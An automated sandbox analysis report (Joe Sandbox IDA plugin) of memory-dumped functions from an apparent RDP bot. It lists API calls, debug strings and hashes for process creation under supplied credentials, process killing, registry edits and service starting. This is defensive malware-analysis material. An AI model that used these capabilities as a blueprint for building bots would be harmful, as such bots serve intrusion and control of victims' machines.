[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu), xrefs: 00007FFDA55AF925
[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu), xrefs: 00007FFDA55AF690
(usr == NULL) || (pwd != NULL), xrefs: 00007FFDA55AF24A
[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu), xrefs: 00007FFDA55AF833
[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu), xrefs: 00007FFDA55AF5A3
[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu), xrefs: 00007FFDA55AF6FF

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: strlen$strcat$CloseErrorHandleLastLogonUser
String ID: (app != NULL)$(pi != NULL)$(usr == NULL) || (pwd != NULL)$C:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu)$[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x)$[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu)$[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu)$[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu)$h$process_create
API String ID: 1842180197-3127737957
Opcode ID: 959a81bb8d9d16c09c9b08e236fed2cef2314a254f742983aa6ea1e17e52b8b3
Instruction ID: 110bc4c212ff954899db4e37d3f3fdee7169894e4af0c3b7007ed1209617b5ea
Opcode Fuzzy Hash: 959a81bb8d9d16c09c9b08e236fed2cef2314a254f742983aa6ea1e17e52b8b3
Instruction Fuzzy Hash: A6126EADB0F64B81EA628F41E4683B96290BF42F84F410932DA4E477D7EF6DE545C708

Function 00007FFDA55AE8AF Relevance: 40.7, APIs: 10, Strings: 13, Instructions: 417stringCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFDA55AE9A7
GetLastError.KERNEL32 ref: 00007FFDA55AEA7F
strcmp.MSVCRT ref: 00007FFDA55AEC4A
OpenProcess.KERNEL32 ref: 00007FFDA55AEC62
TerminateProcess.KERNEL32 ref: 00007FFDA55AEC7C
GetLastError.KERNEL32 ref: 00007FFDA55AEC8A
CloseHandle.KERNEL32 ref: 00007FFDA55AF015

Strings

C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FFDA55AE93E
[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FFDA55AEC9C
[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu), xrefs: 00007FFDA55AE9B9
[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x), xrefs: 00007FFDA55AE985
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55AE953
[I] (%s) -> Done(name=%s,pid=%lu), xrefs: 00007FFDA55AF035
process_kill, xrefs: 00007FFDA55AE94C, 00007FFDA55AE97E, 00007FFDA55AE9B2, 00007FFDA55AEA99, 00007FFDA55AEC95, 00007FFDA55AED2E, 00007FFDA55AEE99, 00007FFDA55AF02E
NULL, xrefs: 00007FFDA55AF096, 00007FFDA55AF0A2
[E] (%s) -> OpenProcess failed(gle=%lu), xrefs: 00007FFDA55AED35
[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FFDA55AEEA0
|, xrefs: 00007FFDA55AE936
[E] (%s) -> Process32First failed(gle=%lu), xrefs: 00007FFDA55AEAA0
(name != NULL) || (pid != 0), xrefs: 00007FFDA55AE945

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: ErrorLast$Process$CloseHandleOpenTerminatestrcmp
String ID: (name != NULL) || (pid != 0)$C:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x)$[E] (%s) -> OpenProcess failed(gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> TerminateProcess failed(gle=%lu)$[I] (%s) -> Done(name=%s,pid=%lu)$process_kill$|
API String ID: 2412365107-2593651398
Opcode ID: f7b16dcb3a4a75ef44623e3ef9a96ca21ea1b3f9bc76733e0abd2494457a4974
Instruction ID: f79b1f518a222bffd376134710ef94fc9fa70335d2bcef33e03e9d52a9b05393
Opcode Fuzzy Hash: f7b16dcb3a4a75ef44623e3ef9a96ca21ea1b3f9bc76733e0abd2494457a4974
Instruction Fuzzy Hash: 8BF1E718B0E70F86FA635E46A4BC3791280AF07F54F251832D70E463D3EE5FB985920A

Function 00007FFDA55A59B9 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 201registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFDA55A59F3
RegSetValueExA.ADVAPI32 ref: 00007FFDA55A5B1C
RegCloseKey.ADVAPI32 ref: 00007FFDA55A5C45

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

Strings

, xrefs: 00007FFDA55A5B5F
P, xrefs: 00007FFDA55A5CCA
[E] (%s) -> RegSetValueExA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFDA55A5B4A
, xrefs: 00007FFDA55A5A20
registry_set_value, xrefs: 00007FFDA55A5A0D, 00007FFDA55A5A62, 00007FFDA55A5A92, 00007FFDA55A5AD2, 00007FFDA55A5B43, 00007FFDA55A5C5E
NULL, xrefs: 00007FFDA55A5B76, 00007FFDA55A5D2F, 00007FFDA55A5D3B
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFDA55A5A14
(key != NULL), xrefs: 00007FFDA55A5A8B
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA55A5AD9
P, xrefs: 00007FFDA55A5BD0
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55A5A69, 00007FFDA55A5A99
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFDA55A5C65
, xrefs: 00007FFDA55A5A31
P, xrefs: 00007FFDA55A5BC7
(root != NULL), xrefs: 00007FFDA55A5A5B
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFDA55A5A54, 00007FFDA55A5A84
, xrefs: 00007FFDA55A5B56

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: CloseOpenValuefflushfwrite
String ID: $ $ $ $(key != NULL)$(root != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegSetValueExA failed(root=0x%p,key=%s,param=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 716145365-86941537
Opcode ID: c6790215c2e1f4f48c06e2e1481d1e32962ce08415568656474ac556ddacbdc2
Instruction ID: 0d73accd7de6d87405bf705283ac27726ffc79648c84dacf54eefe138b7b58e1
Opcode Fuzzy Hash: c6790215c2e1f4f48c06e2e1481d1e32962ce08415568656474ac556ddacbdc2
Instruction Fuzzy Hash: 528167A8B0F70F51FE265F00A87CB792250AF22F44E550532DB1D46BDBFE1EA9848309

Function 00007FFDA55A5654 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 192registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFDA55A5689
RegDeleteValueA.ADVAPI32 ref: 00007FFDA55A578E
RegCloseKey.ADVAPI32 ref: 00007FFDA55A58B7

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

Strings

[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFDA55A57BC
, xrefs: 00007FFDA55A56C7
, xrefs: 00007FFDA55A57D1
registry_del_value, xrefs: 00007FFDA55A56A3, 00007FFDA55A56F8, 00007FFDA55A5728, 00007FFDA55A5768, 00007FFDA55A57B5, 00007FFDA55A58D0
P, xrefs: 00007FFDA55A593C
, xrefs: 00007FFDA55A56B6
NULL, xrefs: 00007FFDA55A57E8, 00007FFDA55A59A1, 00007FFDA55A59AD
, xrefs: 00007FFDA55A57C8
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFDA55A56AA
(key != NULL), xrefs: 00007FFDA55A5721
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA55A576F
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55A56FF, 00007FFDA55A572F
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFDA55A58D7
P, xrefs: 00007FFDA55A5842
(root != NULL), xrefs: 00007FFDA55A56F1
P, xrefs: 00007FFDA55A5839
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFDA55A56EA, 00007FFDA55A571A

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: CloseDeleteOpenValuefflushfwrite
String ID: $ $ $ $(key != NULL)$(root != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 3240087161-1026589300
Opcode ID: 1b1ab82d58521876086c39af6fdbe16a8f611ff3869a73cd1bfda2b6aee98c99
Instruction ID: 4136392c97debe14d3a4b953d2169c404d56a8629d4018dc3e4a074885e98aea
Opcode Fuzzy Hash: 1b1ab82d58521876086c39af6fdbe16a8f611ff3869a73cd1bfda2b6aee98c99
Instruction Fuzzy Hash: 978177A8B0F70F85FE675F00A8687783254AF12F84E550932DB5E067D3FE1EA985C249

Function 00007FFDA55A7E40 Relevance: 31.7, APIs: 5, Strings: 13, Instructions: 187serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDA55A7521: Sleep.KERNEL32 ref: 00007FFDA55A7550

OpenServiceA.ADVAPI32 ref: 00007FFDA55A7E7D
StartServiceA.ADVAPI32 ref: 00007FFDA55A7E9D
GetLastError.KERNEL32 ref: 00007FFDA55A7EAB

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

GetLastError.KERNEL32 ref: 00007FFDA55A7F7C
CloseServiceHandle.ADVAPI32 ref: 00007FFDA55A810C

Strings

, xrefs: 00007FFDA55A7ED7
C:/Projects/rdp/bot/codebase/scm.c, xrefs: 00007FFDA55A7F00
[E] (%s) -> OpenServiceA(SERVICE_START) failed(lpServiceName=%s,gle=%lu), xrefs: 00007FFDA55A7F91
scm_start, xrefs: 00007FFDA55A7EC4, 00007FFDA55A7F0E, 00007FFDA55A7F33, 00007FFDA55A7F54, 00007FFDA55A7F8A, 00007FFDA55A80F1, 00007FFDA55A819B
[E] (%s) -> Service start failed(lpServiceName=%s,err=%08x), xrefs: 00007FFDA55A7F3A
[D] (%s) -> Service start requested(lpServiceName=%s), xrefs: 00007FFDA55A80F8
(svc != NULL), xrefs: 00007FFDA55A7F07
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55A7F15
~, xrefs: 00007FFDA55A80A6
[E] (%s) -> StartServiceA failed(lpServiceName=%s,gle=%lu), xrefs: 00007FFDA55A7ECB
P, xrefs: 00007FFDA55A80AF
[I] (%s) -> Service started(lpServiceName=%s), xrefs: 00007FFDA55A81A2
[D] (%s) -> Service is already running(lpServiceName=%s), xrefs: 00007FFDA55A7F5B

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Service$ErrorLast$CloseHandleOpenSleepStartfflushfwrite
String ID: $(svc != NULL)$C:/Projects/rdp/bot/codebase/scm.c$P$[D] (%s) -> Service is already running(lpServiceName=%s)$[D] (%s) -> Service start requested(lpServiceName=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> OpenServiceA(SERVICE_START) failed(lpServiceName=%s,gle=%lu)$[E] (%s) -> Service start failed(lpServiceName=%s,err=%08x)$[E] (%s) -> StartServiceA failed(lpServiceName=%s,gle=%lu)$[I] (%s) -> Service started(lpServiceName=%s)$scm_start$~
API String ID: 1000571331-2957688017
Opcode ID: e977e50fa5ec83e665be764fc5ff6dc0635237359f1a02084f74bf6b16280fae
Instruction ID: 602d451b7011398e294027a9a0118f82886cad205d019ab6896d7411d44568ca
Opcode Fuzzy Hash: e977e50fa5ec83e665be764fc5ff6dc0635237359f1a02084f74bf6b16280fae
Instruction Fuzzy Hash: 7C712159F0E55FA1FE6A5F1498B83B81260AF03F58F060832CA0E577D3DD1EAD858289

Function 00007FFDA55A1E0B Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 133fileCOMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFDA55A1F1F
_errno.MSVCRT ref: 00007FFDA55A1F40
fwrite.MSVCRT ref: 00007FFDA55A1FB4

Strings

[E] (%s) -> Failed(path=%s,mode=%s,err=%08x), xrefs: 00007FFDA55A1E9C
[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d), xrefs: 00007FFDA55A1FE4
[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d), xrefs: 00007FFDA55A1F34
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55A1ED2, 00007FFDA55A1F02
(path != NULL), xrefs: 00007FFDA55A1EC4
fs_file_write, xrefs: 00007FFDA55A1E95, 00007FFDA55A1ECB, 00007FFDA55A1EFB, 00007FFDA55A1F2D, 00007FFDA55A1FDD, 00007FFDA55A208D
(mode != NULL), xrefs: 00007FFDA55A1EF4
NULL, xrefs: 00007FFDA55A206A, 00007FFDA55A2076
[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu), xrefs: 00007FFDA55A2094
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFDA55A1EBD, 00007FFDA55A1EED

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: _errno$fwrite
String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
API String ID: 116495842-544371937
Opcode ID: 0899e4bddf07ad0306c22b9e0b2a24751860f95e87bc8d5d9f86294b1d25de8d
Instruction ID: 6c04adeceb0833d5c2fa64df5894c8ac71ff9819ba3e0f57a6257c9033456671
Opcode Fuzzy Hash: 0899e4bddf07ad0306c22b9e0b2a24751860f95e87bc8d5d9f86294b1d25de8d
Instruction Fuzzy Hash: 55516D69F0A64F81EE12AF14E9693B82661BF52F90F454532DA0D073D3EF3DE9068308

Function 00007FFDA55ACDB2 Relevance: 25.7, APIs: 7, Strings: 10, Instructions: 241memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFDA55ACDFD
HeapFree.KERNEL32 ref: 00007FFDA55ACE0E

Part of subcall function 00007FFDA55A20A5: fopen.MSVCRT ref: 00007FFDA55A20EA
Part of subcall function 00007FFDA55A20A5: fseek.MSVCRT ref: 00007FFDA55A2109
Part of subcall function 00007FFDA55A20A5: _errno.MSVCRT ref: 00007FFDA55A211D
Part of subcall function 00007FFDA55A20A5: _errno.MSVCRT ref: 00007FFDA55A2138

GetProcessHeap.KERNEL32 ref: 00007FFDA55ACF3A
HeapAlloc.KERNEL32 ref: 00007FFDA55ACF4B
strncpy.MSVCRT ref: 00007FFDA55AD08C
strncpy.MSVCRT ref: 00007FFDA55AD0A3
strncpy.MSVCRT ref: 00007FFDA55AD102

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFDA55ACE46
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFDA55ACF9A
mem_alloc, xrefs: 00007FFDA55ACF93
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55ACE82
(path != NULL), xrefs: 00007FFDA55ACE74
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDA55ACE6D
[I] (%s) -> Done(path=%s), xrefs: 00007FFDA55AD168
ini_load, xrefs: 00007FFDA55ACE3F, 00007FFDA55ACE7B, 00007FFDA55AD161
5, xrefs: 00007FFDA55ACE65
NULL, xrefs: 00007FFDA55AD152

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
API String ID: 1423203057-2746879330
Opcode ID: 6ecf6371947af581774eebf3c09d8e48d851089462931acfdf1c98c03473eb14
Instruction ID: da00a6cda28b2764e108a43f17b977698004153f860fdfd7a7c2252c037beb6e
Opcode Fuzzy Hash: 6ecf6371947af581774eebf3c09d8e48d851089462931acfdf1c98c03473eb14
Instruction Fuzzy Hash: 6DA1A26AB0E68A95EB138F04E4687B96790AB43F84F454831EB4D477C7EE2EE545C308

Function 00007FFDA55A4246 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 154COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32 ref: 00007FFDA55A427A

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

GetLastError.KERNEL32 ref: 00007FFDA55A43D9

Strings

[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu), xrefs: 00007FFDA55A43EE
((*xpath_sz) > 0), xrefs: 00007FFDA55A436D
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55A42E8, 00007FFDA55A431B, 00007FFDA55A434B, 00007FFDA55A437B
(path != NULL), xrefs: 00007FFDA55A42DA
[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu), xrefs: 00007FFDA55A42B5
fs_path_expand, xrefs: 00007FFDA55A42AE, 00007FFDA55A42E1, 00007FFDA55A4314, 00007FFDA55A4344, 00007FFDA55A4374, 00007FFDA55A43A6, 00007FFDA55A43E7, 00007FFDA55A44B4
(xpath_sz != NULL), xrefs: 00007FFDA55A433D
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFDA55A42D3, 00007FFDA55A4306, 00007FFDA55A4336, 00007FFDA55A4366
(xpath != NULL), xrefs: 00007FFDA55A430D
[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x), xrefs: 00007FFDA55A43AD
[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu), xrefs: 00007FFDA55A44BB

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: EnvironmentErrorExpandLastStringsfflushfwrite
String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
API String ID: 1721699506-2819899730
Opcode ID: 852bc3399429a0cfe269aba0471b5ee04fe5b0419ba2eb07b051e5bad8c194e6
Instruction ID: 2f463ab28ca3a45b7516f369e8984d299ac87be201d511e13172f707dbbf3d7f
Opcode Fuzzy Hash: 852bc3399429a0cfe269aba0471b5ee04fe5b0419ba2eb07b051e5bad8c194e6
Instruction Fuzzy Hash: 21616A6AF0E50FD1FB229F94E8683B86655AF42B44F560532D60D073D3EE7DE9868308

Function 00007FFDA55AB989 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 103COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 00007FFDA55AB9B6
LoadResource.KERNEL32 ref: 00007FFDA55AB9CE

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

GetLastError.KERNEL32 ref: 00007FFDA55ABAC8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,00007FFDA55A6C82), ref: 00007FFDA55ABAFD
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,00007FFDA55A6C82), ref: 00007FFDA55ABB02

Strings

C:/Projects/rdp/bot/codebase/module.c, xrefs: 00007FFDA55ABA7A, 00007FFDA55ABAA5
(hnd != NULL), xrefs: 00007FFDA55ABA81
[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat, xrefs: 00007FFDA55ABA56
(out != NULL), xrefs: 00007FFDA55ABAAC
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55ABA8F, 00007FFDA55ABABA
[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu), xrefs: 00007FFDA55ABADD
module_get_version, xrefs: 00007FFDA55ABA4F, 00007FFDA55ABA88, 00007FFDA55ABAB3, 00007FFDA55ABAD6, 00007FFDA55ABB0B
[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu), xrefs: 00007FFDA55ABB12

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
